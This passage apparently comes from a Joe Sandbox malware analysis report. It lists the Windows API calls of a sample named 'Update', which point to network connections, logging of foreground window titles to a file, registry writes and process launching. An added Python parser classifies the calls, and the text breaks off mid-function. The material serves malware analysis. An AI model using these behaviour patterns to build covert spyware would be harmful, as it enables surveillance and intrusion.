                                                                                            • SetLastError.KERNEL32(000000C1,?,?,?,?,?,?,034EA8C1,?,?), ref: 034EDA62
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1452528299-0

APIs
• _memset.LIBCMT ref: 034EC63D
• _memset.LIBCMT ref: 034EC64C
• RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000), ref: 034EC66F
  • Part of subcall function 034EC81E: RegCloseKey.ADVAPI32(80000000,034EC7FA), ref: 034EC82B
  • Part of subcall function 034EC81E: RegCloseKey.ADVAPI32(00000000), ref: 034EC834
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Similarity
• API ID: Close_memset$Open
• String ID: %08X
• API String ID: 4292648718-3773563069

APIs
• socket.WS2_32(00000002,00000002,00000011), ref: 034E3710
• WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 034E3749
• setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 034E3766
• setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 034E3779
• WSACreateEvent.WS2_32 ref: 034E377B
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,03511F0C), ref: 034E378D
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,03511F0C), ref: 034E3799
• lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,03511F0C), ref: 034E37B8
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,03511F0C), ref: 034E37C4
• gethostbyname.WS2_32(00000000), ref: 034E37D2
• htons.WS2_32(?), ref: 034E37F8
• WSAEventSelect.WS2_32(?,?,00000030), ref: 034E3816
• connect.WS2_32(?,?,00000010), ref: 034E382B
• WSAGetLastError.WS2_32(?,?,?,?,?,?,?,03511F0C), ref: 034E383A
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Similarity
• API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
• String ID:
• API String ID: 1455939504-0

APIs
• GetLocalTime.KERNEL32(?,DF800B7B), ref: 034EAA58
• wsprintfW.USER32 ref: 034EAA8F
• _memset.LIBCMT ref: 034EAAA7
• _memset.LIBCMT ref: 034EAABA
  • Part of subcall function 034E8020: lstrlenW.KERNEL32(?), ref: 034E8038
  • Part of subcall function 034E8020: _memset.LIBCMT ref: 034E8042
  • Part of subcall function 034E8020: lstrlenW.KERNEL32(?), ref: 034E804B
  • Part of subcall function 034E8020: lstrlenW.KERNEL32(?), ref: 034E8056
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 034EABBE
• Sleep.KERNEL32(000003E8,?,?,?,?,?,?), ref: 034EAC6E
• CloseHandle.KERNEL32(?), ref: 034EACAA
  • Part of subcall function 034EF707: _malloc.LIBCMT ref: 034EF721
  • Part of subcall function 034E9730: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,DF800B7B,00000000,?,?,?,00000000,0350125B,000000FF,?,034EE04E,00000000), ref: 034E9773
  • Part of subcall function 034E9730: InitializeCriticalSectionAndSpinCount.KERNEL32(034EE1AE,00000000,?,?,?,00000000,0350125B,000000FF,?,034EE04E), ref: 034E9812
  • Part of subcall function 034E9730: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0350125B,000000FF,?,034EE04E), ref: 034E9850
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Similarity
• API ID: CreateEvent_memsetlstrlen$CloseCountCriticalHandleInitializeLocalSectionSleepSpinTime_mallocwsprintf
• String ID: %4d.%2d.%2d-%2d:%2d:%2d$o1:$p1:$t1:
• API String ID: 1254190970-1225219777

APIs
• socket.WS2_32(00000002,00000002,00000011), ref: 009136E7
• WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 00913720
• WSACreateEvent.WS2_32 ref: 00913752
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,1001D990), ref: 00913764
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,1001D990), ref: 00913770
• lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,1001D990), ref: 0091378F
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,1001D990), ref: 0091379B
• gethostbyname.WS2_32(00000000), ref: 009137A9
• htons.WS2_32(?), ref: 009137CF
• WSAEventSelect.WS2_32(?,?,00000030), ref: 009137ED
• connect.WS2_32(?,?,00000010), ref: 00913802
• WSAGetLastError.WS2_32(?,?,?,?,?,?,?,1001D990), ref: 00913811
Memory Dump Source
• Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_910000_Update.jbxd
Similarity
• API ID: ByteCharEventMultiWidelstrlen$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
• String ID:
• API String ID: 1463362053-0

Memory Dump Source
• Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_910000_Update.jbxd
Similarity
• API ID: _memset$FreeVirtual
• String ID: !jWW$.$_$i$l${vU_
• API String ID: 974088968-3065862289

APIs
• RegOpenKeyExW.ADVAPI32(80000001,AppEvents,00000000,00000002,?), ref: 034EC889
• RegDeleteValueW.ADVAPI32(?), ref: 034EC894
• RegCloseKey.ADVAPI32(?), ref: 034EC8A4
• RegCreateKeyW.ADVAPI32(80000001,AppEvents,?), ref: 034EC8C3
• lstrlenW.KERNEL32(?), ref: 034EC8D1
• RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 034EC8E4
• RegCloseKey.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 034EC8F2
• RegCloseKey.ADVAPI32(?), ref: 034EC900
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Similarity
• API ID: Close$Value$CreateDeleteOpenlstrlen
• String ID: AppEvents$Network
• API String ID: 3935456190-3733486940

Memory Dump Source
• Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_3040000_Update.jbxd
Similarity
• API ID: _memset$swprintf$_malloc
• String ID:
• API String ID: 1873853019-0

APIs
• SetLastError.KERNEL32(0000139F,100191B0,100151A4,?,?,00000001), ref: 00914C9D
• RtlEnterCriticalSection.NTDLL(?), ref: 00914CC4
• SetLastError.KERNEL32(0000139F), ref: 00914CD8
• RtlLeaveCriticalSection.NTDLL(?), ref: 00914CDF
Memory Dump Source
• Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_910000_Update.jbxd
Similarity
• API ID: CriticalErrorLastSection$EnterLeave
• String ID:
• API String ID: 2124651672-0

APIs
• SetLastError.KERNEL32(0000139F,DF800B7B,?,?,?,?,00000000,000000FF,00000000), ref: 034E4CE6
• EnterCriticalSection.KERNEL32(?,DF800B7B,?,?,?,?,00000000,000000FF,00000000), ref: 034E4D0D
• SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 034E4D21
• LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 034E4D28
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Similarity
• API ID: CriticalErrorLastSection$EnterLeave
• String ID:
• API String ID: 2124651672-0

Memory Dump Source
• Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_3040000_Update.jbxd
Similarity
• API ID: _memset$_wcsrchr
• String ID: D
• API String ID: 170005318-2746444292
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034EE751
                                                                                            • GetForegroundWindow.USER32(?,74DF23A0,00000000), ref: 034EE759
                                                                                            • GetWindowTextW.USER32(00000000,035116F0,00000800), ref: 034EE76F
                                                                                            • _memset.LIBCMT ref: 034EE78D
                                                                                            • lstrlenW.KERNEL32(035116F0,?,?,?,?,74DF23A0,00000000), ref: 034EE7AC
                                                                                            • GetLocalTime.KERNEL32(?,?,?,?,?,74DF23A0,00000000), ref: 034EE7BD
                                                                                            • wsprintfW.USER32 ref: 034EE804
                                                                                              • Part of subcall function 034EE6B0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,034EE815,?,?,?,?,74DF23A0,00000000), ref: 034EE6BD
                                                                                              • Part of subcall function 034EE6B0: CreateFileW.KERNEL32(03510D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,034EE815,?,?,?,?,74DF23A0,00000000), ref: 034EE6D7
                                                                                              • Part of subcall function 034EE6B0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 034EE6F2
                                                                                              • Part of subcall function 034EE6B0: lstrlenW.KERNEL32(?,00000000,00000000), ref: 034EE6FF
                                                                                              • Part of subcall function 034EE6B0: WriteFile.KERNEL32(00000000,?,00000000), ref: 034EE70A
                                                                                              • Part of subcall function 034EE6B0: CloseHandle.KERNEL32(00000000), ref: 034EE711
                                                                                              • Part of subcall function 034EE6B0: ReleaseMutex.KERNEL32(00000000), ref: 034EE71E
                                                                                            • _memset.LIBCMT ref: 034EE820
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File_memset$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
                                                                                            • String ID: [
                                                                                            • API String ID: 2192163267-4056885943
                                                                                            • Opcode ID: 8de8d56bbf4b3199b611b47389a41c04c57ab3feb6751cb5930bd9ff1e952bd7
                                                                                            • Instruction ID: 95d1de6b009234250c47015edd349f36c40bfed0ce0ee9e4d99b1d8370554723
                                                                                            • Opcode Fuzzy Hash: 8de8d56bbf4b3199b611b47389a41c04c57ab3feb6751cb5930bd9ff1e952bd7
                                                                                            • Instruction Fuzzy Hash: 0E212670900218AAD760EF91DC05FBA73BCFB04701F04819ABA4496154DE755ACADBE8
                                                                                            APIs
                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,034E398D,?,00000000,000000FF,00000000), ref: 034E3E05
                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,034E398D,?,00000000,000000FF,00000000), ref: 034E3E50
                                                                                            • send.WS2_32(?,000000FF,00000000,00000000), ref: 034E3E6E
                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 034E3E81
                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 034E3E94
                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,034E398D,?,00000000,000000FF,00000000), ref: 034E3EBC
                                                                                            • WSAGetLastError.WS2_32(?,?,034E398D,?,00000000,000000FF,00000000), ref: 034E3EC7
                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,034E398D,?,00000000,000000FF,00000000), ref: 034E3EDB
                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 034E3F14
                                                                                            • HeapFree.KERNEL32(00000000,00000000,?), ref: 034E3F51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                                                                            • String ID:
                                                                                            • API String ID: 1701177279-0
                                                                                            • Opcode ID: 196fc7f5309afc00abfc9e7c9693b7cf3486bd3c341c34a62c56532867d58ef2
                                                                                            • Instruction ID: 6b62e0cb2673488f63051558d7a88785f22149cc170b46648ab86b7b1345e454
                                                                                            • Opcode Fuzzy Hash: 196fc7f5309afc00abfc9e7c9693b7cf3486bd3c341c34a62c56532867d58ef2
                                                                                            • Instruction Fuzzy Hash: 044137755047059FC726DFB8D9C8AA7B7F8FB48306F04896EE86ECB244D731A8068B54
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(0000000D), ref: 00914F1A
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 00914F2F
                                                                                            • WSASetLastError.WS2_32(00002746), ref: 00914F41
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 00914F48
                                                                                            • timeGetTime.WINMM ref: 00914F76
                                                                                            • timeGetTime.WINMM ref: 00914F9E
                                                                                            • SetEvent.KERNEL32(?), ref: 00914FDC
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 00914FE8
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 00914FEF
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 00915002
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                            • String ID:
                                                                                            • API String ID: 1979691958-0
                                                                                            • Opcode ID: 0eddb7f70435084fad788b00feb35f5cb1569ae860eba9b4df7dc0cd97004f8a
                                                                                            • Instruction ID: c8fffe270cc2cd50cdf58b9402cf5d0c7ec807f2cd3cc5d53ca68f2fd2480518
                                                                                            • Opcode Fuzzy Hash: 0eddb7f70435084fad788b00feb35f5cb1569ae860eba9b4df7dc0cd97004f8a
                                                                                            • Instruction Fuzzy Hash: 1A41B331700608DFD7219F68C988BAAB7F9FF4C315F058559E88ACB351D776E8868B81
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 034E4F63
                                                                                            • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 034E4F78
                                                                                            • WSASetLastError.WS2_32(00002746), ref: 034E4F8A
                                                                                            • LeaveCriticalSection.KERNEL32(000002FF), ref: 034E4F91
                                                                                            • timeGetTime.WINMM ref: 034E4FBF
                                                                                            • timeGetTime.WINMM ref: 034E4FE7
                                                                                            • SetEvent.KERNEL32(?), ref: 034E5025
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 034E5031
                                                                                            • LeaveCriticalSection.KERNEL32(000002FF), ref: 034E5038
                                                                                            • LeaveCriticalSection.KERNEL32(000002FF), ref: 034E504B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                            • String ID:
                                                                                            • API String ID: 1979691958-0
                                                                                            • Opcode ID: af4212e86519177bf68e1eaadba34aa29348bcba68359b724c5bcca665f41f91
                                                                                            • Instruction ID: 6bade82eadc4af534f4eda0ca9c32a434ae57d6d0bf1ae05226e28aa9e711c42
                                                                                            • Opcode Fuzzy Hash: af4212e86519177bf68e1eaadba34aa29348bcba68359b724c5bcca665f41f91
                                                                                            • Instruction Fuzzy Hash: FF4126312003019FC730EF6AD588A7BB7E9FF4871AF08499AE44ACB751E336E4058B84
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034EC2AE
                                                                                            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 034EC2CC
                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 034EC309
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 034EC314
                                                                                            • lstrlenW.KERNEL32(?), ref: 034EC321
                                                                                            • wsprintfW.USER32 ref: 034EC345
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandleWrite_memsetlstrlenwsprintf
                                                                                            • String ID: %s %s
                                                                                            • API String ID: 1326869720-2939940506
                                                                                            • Opcode ID: 37b039f88778ac8d31eff9fdd6af5aed0ddb6203e89cae007d60dd144c71c90b
                                                                                            • Instruction ID: 3246eba0e97e67e623079d1ab715c6c92a8e237ccb78374a85ac3cc5f953fd23
                                                                                            • Opcode Fuzzy Hash: 37b039f88778ac8d31eff9fdd6af5aed0ddb6203e89cae007d60dd144c71c90b
                                                                                            • Instruction Fuzzy Hash: EC31A4326402186FDB24EB64DC89FEF7378EB45312F44069AFA15AA1C0DA315E49CFA5
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?), ref: 034EC98D
                                                                                            • _wcsrchr.LIBCMT ref: 034EC9C7
                                                                                              • Part of subcall function 034E7C80: LoadLibraryW.KERNEL32(wininet.dll), ref: 034E7CC3
                                                                                              • Part of subcall function 034E7C80: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 034E7CD7
                                                                                              • Part of subcall function 034E7C80: FreeLibrary.KERNEL32(00000000), ref: 034E7CF7
                                                                                            • GetFileAttributesW.KERNEL32(-00000002), ref: 034EC9E6
                                                                                            • GetLastError.KERNEL32 ref: 034EC9F1
                                                                                            • _memset.LIBCMT ref: 034ECA04
                                                                                            • CreateProcessW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 034ECA31
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Library$AddressAttributesCreateErrorFileFreeLastLoadProcProcess_memset_wcsrchrlstrlen
                                                                                            • String ID: D$WinSta0\Default
                                                                                            • API String ID: 174883095-1101385590
                                                                                            • Opcode ID: e9621c3a74240192facb74f2b68672392420078eeaec355bb55abeb0506b6df0
                                                                                            • Instruction ID: 7a696d8610cea6c369e72707bb993ca0f3270c78af105035bda02f4f1b089c29
                                                                                            • Opcode Fuzzy Hash: e9621c3a74240192facb74f2b68672392420078eeaec355bb55abeb0506b6df0
                                                                                            • Instruction Fuzzy Hash: 49110DB79002082BD720E7B59C85FBFB76CDB45715F08012BFA05DE2C4E636D905D6A9
                                                                                            APIs
                                                                                            • lstrcmpiW.KERNEL32(?,A:\), ref: 034E8166
                                                                                            • lstrcmpiW.KERNEL32(?,B:\), ref: 034E8176
                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 034E81A6
                                                                                            • lstrlenW.KERNEL32(?), ref: 034E81B7
                                                                                            • __wcsnicmp.LIBCMT ref: 034E81CE
                                                                                            • lstrcpyW.KERNEL32(00000AD4,?), ref: 034E8204
                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 034E8228
                                                                                            • lstrcatW.KERNEL32(?,00000000), ref: 034E8233
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: lstrcmpilstrcpy$DeviceQuery__wcsnicmplstrcatlstrlen
                                                                                            • String ID: A:\$B:\
                                                                                            • API String ID: 4249875308-1009255891
                                                                                            • Opcode ID: 75bdb249d1a6fb39de7e914df260ae83b7cacc6bbe014ffb7e2fbda36a7d4e8b
                                                                                            • Instruction ID: 4c5caac4410d6052d9e40c77406be87e91a7490e00ee629b184c6ccce7359767
                                                                                            • Opcode Fuzzy Hash: 75bdb249d1a6fb39de7e914df260ae83b7cacc6bbe014ffb7e2fbda36a7d4e8b
                                                                                            • Instruction Fuzzy Hash: E8118131A00219DBDF20EF90DC44BEEB378EF44605F044499DE0AA7240E771EA09CB95
                                                                                            APIs
                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,DF800B7B,00000000,?,?,?,00000000,0350125B,000000FF,?,034EE04E,00000000), ref: 034E9773
                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(034EE1AE,00000000,?,?,?,00000000,0350125B,000000FF,?,034EE04E), ref: 034E9812
                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0350125B,000000FF,?,034EE04E), ref: 034E9850
                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0350125B,000000FF,?,034EE04E), ref: 034E9875
                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0350125B,000000FF,?,034EE04E), ref: 034E989A
                                                                                              • Part of subcall function 034E1280: __CxxThrowException@8.LIBCMT ref: 034E1290
                                                                                              • Part of subcall function 034E1280: DeleteCriticalSection.KERNEL32(00000000,034ED3E6,03506624,?,?,034ED3E6,?,?,?,?,03505A40,00000000), ref: 034E12A1
                                                                                              • Part of subcall function 034ECE10: InitializeCriticalSectionAndSpinCount.KERNEL32(034EE076,00000000,DF800B7B,034EE04E,74DF2F60,00000000,?,034EE226,0350110B,000000FF,?,034E994A,034EE226), ref: 034ECE67
                                                                                              • Part of subcall function 034ECE10: InitializeCriticalSectionAndSpinCount.KERNEL32(034EE08E,00000000,?,034EE226,0350110B,000000FF,?,034E994A,034EE226,?,?,?,00000000,0350125B,000000FF), ref: 034ECE83
                                                                                            • InterlockedExchange.KERNEL32(034EE066,00000000), ref: 034E99A0
                                                                                            • timeGetTime.WINMM(?,?,?,00000000,0350125B,000000FF,?,034EE04E), ref: 034E99A6
                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,0350125B,000000FF,?,034EE04E), ref: 034E99B4
                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0350125B,000000FF,?,034EE04E), ref: 034E99BD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                            • String ID:
                                                                                            • API String ID: 1400036169-0
                                                                                            • Opcode ID: 7c359ca3a97526145885571a37b8c29c61d9a144737e06b73c0e1ce5d812baa2
                                                                                            • Instruction ID: c89faefda9304074c2dde9ea05e6f5e17497939c532e1e1f36ec542251cca914
                                                                                            • Opcode Fuzzy Hash: 7c359ca3a97526145885571a37b8c29c61d9a144737e06b73c0e1ce5d812baa2
                                                                                            • Instruction Fuzzy Hash: AB81E7B0A01A46BFD344DF7AC884B9AFBA8FB08304F50462ED12CDB650D775A964CF94
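The records above list the raw API calls of each function but leave it to the reader to say what they add up to. The parser below is an added example, not part of the Joe Sandbox report or its IDA plugin: it reads API lines in the exact format printed here and tags each record with the behaviour its calls imply. The SAMPLE text is constructed by copying call and String ID lines from records on this page (the GetForegroundWindow/GetWindowTextW/GetLocalTime record with its CreateFileW/WriteFile subcalls, the CreateProcessW record whose String ID is D$WinSta0\Default, the A:\ / B:\ QueryDosDeviceW record, and the setsockopt and WSASetLastError lines). The behaviour rules are this example's own heuristics, and the Winsock constant table covers only the values that appear on this page.

```python
"""Tag Joe Sandbox per-function API records with the behaviour they imply (added example)."""
import re

# One API line: optional "Part of subcall function X:" prefix, Name.MODULE,
# optional "(args)", then "ref: ADDR" (e.g. "wsprintfW.USER32 ref: 034EE804" has no args).
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
STRING_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")

# Winsock constants for the raw hex the report prints in setsockopt/WSASetLastError lines.
SOL_SOCKET = 0xFFFF
SOCKOPT_NAMES = {0x1001: "SO_SNDBUF", 0x1002: "SO_RCVBUF"}
WSA_ERRORS = {0x2746: "WSAECONNRESET"}   # 10054

def to_int(tok):
    """Arguments are hex words such as 00000000 or -00000002; '?' or a path gives None."""
    try:
        return int(tok.strip(), 16)
    except ValueError:
        return None

def parse_records(text):
    """One record per 'APIs' heading: its calls (subcalls included) and its String IDs."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"calls": [], "strings": []}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur["calls"].append({"name": m["name"], "module": m["mod"], "args": args,
                                 "ref": m["ref"], "subcall": m["sub"]})
            continue
        m = STRING_RE.match(line)
        if m:  # the report joins several string IDs with '$'
            cur["strings"].extend(s for s in m["ids"].split("$") if s)
    return records

def classify(record):
    """Return the behaviour tags this record's calls and strings imply (heuristics)."""
    names = {c["name"] for c in record["calls"]}
    tags = []
    # Foreground window title + local time, then CreateFileW/WriteFile in a callee: an activity log.
    if {"GetForegroundWindow", "GetWindowTextW", "GetLocalTime",
            "CreateFileW", "WriteFile"} <= names:
        tags.append("window-title activity logger (writes to file)")
    # lstrcmpiW against "A:\" / "B:\" plus QueryDosDeviceW: walking drive letters.
    drives = [a for c in record["calls"] if c["name"] == "lstrcmpiW"
              for a in c["args"] if re.fullmatch(r"[A-Z]:\\", a)]
    if "QueryDosDeviceW" in names and drives:
        tags.append("drive enumeration (compares against " + ", ".join(drives) + ")")
    # CreateProcessW with lpDesktop "WinSta0\Default": the child runs on the interactive desktop.
    if "CreateProcessW" in names and "WinSta0\\Default" in record["strings"]:
        tags.append("process launched on interactive desktop WinSta0\\Default")
    for c in record["calls"]:
        if c["name"] == "setsockopt" and len(c["args"]) >= 3:
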